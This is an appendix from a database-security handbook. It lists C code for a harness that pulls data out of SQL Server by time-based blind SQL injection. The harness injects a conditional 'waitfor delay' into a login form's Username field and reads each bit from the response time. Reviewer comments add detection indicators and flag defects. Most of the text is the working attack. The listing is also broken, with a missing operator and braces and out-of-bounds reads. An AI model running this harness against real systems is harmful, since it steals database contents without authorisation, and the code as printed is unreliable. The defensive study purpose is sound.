Appendix A: Example C Code for a Time-Delay SQL Injection Harness

 /*
  * Appendix listing (Windows C): a harness that recovers a string one bit
  * at a time by injecting a SQL Server `waitfor delay` condition and timing
  * the HTTP response.  The text was extracted from print, so indentation,
  * at least one operator and the final closing brace are missing, and the
  * globals it reads (out, query, bit_start, bit_end, len) and the helpers
  * syntax(), safe_strcat() and WebGet() are defined elsewhere and not shown.
  *
  * Defender's reading of what is visible below: every bit costs one POST to
  * /login.asp whose body is the percent-hex-encoded string "'; <query> if
  * (ascii(substring(@s, N, 1)) & (power(2, M))) > 0 waitfor delay '0:0:4'--",
  * and the harness classifies the bit by whether the round trip exceeds a
  * fixed threshold.  The encoded "waitfor delay" token in a form body and
  * the long run of near-identical requests differing only in N/M are the
  * observable indicators of this technique.
  */

 /**
  * Entry point.
  *   argv[1]  query fragment that is injected verbatim
  *   argv[2]  first bit index to read (atoi, unchecked)
  *   argv[3]  one past the last bit index to read (atoi, unchecked)
  * Spawns one worker thread per bit, waits up to 30 s for it, and stops
  * early once the byte being filled and the byte before it are both zero.
  * Returns 0 on completion, 1 on a wait timeout, else whatever syntax()
  * returns when argc != 4.
  */
 int main( int argc, char *argv[] ) {
       int i, t;
       HANDLE h_thread[32];   /* only h_thread[0] is ever used: the inner loop runs once */

       memset( out, 0, 1024 * 64 );   /* out: global result buffer, presumably 64 KiB -- not shown */

       if ( argc != 4 )
             return syntax();

       query = argv[1];
       bit_start = atoi( argv[2] );
       bit_end = atoi( argv[3] );

       for( i = bit_start; i < bit_end; i += 1 )
       {
             /* t < 1: exactly one thread per iteration; the bit index travels
              * through the thread argument pointer */
             for( t = 0; t < 1; t++ )
             {
             h_thread[t] = (HANDLE)_beginthread( thread_proc, 0, (void *)(i+t) );
             }

             /* 30 s upper bound per bit (the worker itself sleeps 2 s before the request) */
             if ( WaitForMultipleObjects( 1, h_thread, TRUE, 30000 ) == WAIT_TIMEOUT )
             {
                   printf( "Error - timeout waiting for response\n" );
                   return 1;
             }

             /* Stop condition: current and previous recovered byte both zero.
              * NOTE(review): for i < 8 this reads out[-1], an out-of-bounds read. */
             if ( ( out[ i / 8 ] == 0 ) && ( out[ (i / 8) - 1 ] == 0 ) )
             {
                   printf("Done!\n");
                   return 0;
             }
       }

       return 0;
 }

 /**
  * Build the HTTP request that tests one bit.
  *   query     fragment injected after "'; "
  *   bit       bit index; byte = bit/8 (1-based in the SQL), bit-in-byte = bit%8
  *   request   output buffer the headers and body are appended to
  *   buff_len  size of `request`, passed to every safe_strcat() call
  * Always returns 1.
  * NOTE(review): the safe_strcat() calls on query_string are also bounded by
  * buff_len rather than by sizeof query_string; the two sizes coincide only
  * because the sole caller passes 1024 * 64.
  */
 int create_get_bit_request( char *query, int bit, char *request, int buff_len ) {
       char params[ 1024 * 64 ] = "";
       char content_length[32] = "";
       char tmp[32] = "";
       char query_string[1024 * 64] = "";
       int i;

       // create bit-retriveal query string

       safe_strcat( query_string, "'; ", buff_len );
       safe_strcat( query_string, query, buff_len );

       /* The conditional delay: 4 s when the selected bit of the selected
        * character of @s is set.  sprintf() into params is unbounded but the
        * format plus two ints fits comfortably in 64 KiB. */
       sprintf( params, " if (ascii(substring(@s, %d, 1)) & ( power(2,  %d))) > 0 waitfor delay '0:0:4'--", (bit / 8)+1, bit % 8 );
       safe_strcat( query_string, params, buff_len );

       params[0] = 0;

       /* Fixed request line and headers; host and path are hard-coded. */
       safe_strcat( request, "POST /login.asp HTTP/1.1\r\n", buff_len );
       safe_strcat( request, "Content-Type: application/x-www-form-urlencoded\r\n", buff_len );
       safe_strcat( request, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)\r\n", buff_len );
       safe_strcat( request, "Host: 192.168.0.1\r\n", buff_len );
       safe_strcat( request, "Connection: Close\r\n", buff_len );
       safe_strcat( request, "Cache-Control: no-cache\r\n", buff_len
 );

       /* Form body: the whole query_string goes into the Username field,
        * every byte emitted as "%" followed by its hex value. */
       safe_strcat( params, "submit=Submit&Password=&Username=", 1024 * 64 );

       /* NOTE(review): "%x" with a promoted char prints one digit for values
        * below 0x10 and a sign-extended value for negative chars (char
        * signedness is implementation-defined), so this is not strict
        * two-digit percent-encoding; strlen() is re-evaluated each iteration. */
       for( i = 0; i < (int)strlen( query_string ); i++ )
       {
             sprintf( tmp, "%%%x", query_string[i] );
             safe_strcat( params, tmp, 1024 * 64 );
       }

       /* NOTE(review): "%d" with a size_t argument is a format/argument mismatch. */
       sprintf( content_length, "%d", strlen( params ) );

       safe_strcat( request, "Content-Length: ", buff_len );
       safe_strcat( request, content_length, buff_len );
       safe_strcat( request, "\r\n\r\n", buff_len );

       safe_strcat( request, params, buff_len );

       return 1;
 }
 }   /* NOTE(review): stray closing brace in the extracted listing */

 /**
  * Worker thread body: build and time the request for one bit.
  *   bit  bit index, received through the _beginthread argument pointer
  * Reads the globals query, out and len; prints the recovered buffer so far.
  * NOTE(review): _beginthread expects a void(*)(void *) routine; this
  * signature is int(int), so the call in main relies on a non-portable cast.
  */
 int thread_proc( int bit ) {
       char request[ 1024 * 64 ] = "";
       int num_zeroes = 0;   /* unused */

       request[0] = 0;   /* redundant: request is already "" */
       create_get_bit_request( query, bit, request, 1024 * 64 );
       do_time_web_request( request, bit, out, len );

       printf( "String = %s\n", out );

       return 0;
 }

 /**
  * Send one request and classify the bit by elapsed wall-clock time.
  *   request     full HTTP request text
  *   bit         bit index; byte = bit/8, bit-in-byte = bit%8
  *   out_string  buffer whose bit is set when the response was slow
  *   len         length of out_string in bytes
  * Returns 1 when the bit was judged set, 0 otherwise.
  * Timing: the stopwatch starts before a fixed Sleep(2000), so the 4000 ms
  * threshold leaves roughly 2 s for the request itself; the injected delay
  * is 4 s.  The response body in `output` is discarded.
  * NOTE(review): `byte <= len` allows byte == len, one past the buffer.
  * NOTE(review): the operator between out_string[byte] and (1 << bbit) was
  * lost in extraction; as printed this line does not compile.  The final
  * `return 1;` is unreachable and the function's closing brace is missing
  * from the listing.
  */
 int do_time_web_request( char *request, int bit, char *out_string, int len ) {
       char output[ 1024 * 64 ];
       int out_len = 1024 * 64;
       DWORD start;
       int byte = bit / 8;
       int bbit = bit % 8;

       start = GetTickCount();

       memset( output, 0, (1024 * 64) );

       Sleep(2000);

       WebGet( "192.168.0.1", 80, 0, request, output, &out_len );   /* hard-coded host and port; WebGet not shown */

       if ( ( GetTickCount() - start ) > 4000 )
       {
             printf( "bit %d\t=1\n", bit );

             // set the bit
             if ( byte <= len )
                   out_string[byte] = out_string[byte]  (1 << bbit);
             else
                   printf("error - output string too short" );

             return 1;
       }
       else
       {
             printf( "bit %d\t=0\n", bit );

             return 0;
       }

       return 1;


Database Hacker's Handbook. Defending Database Servers
The Database Hackers Handbook: Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156
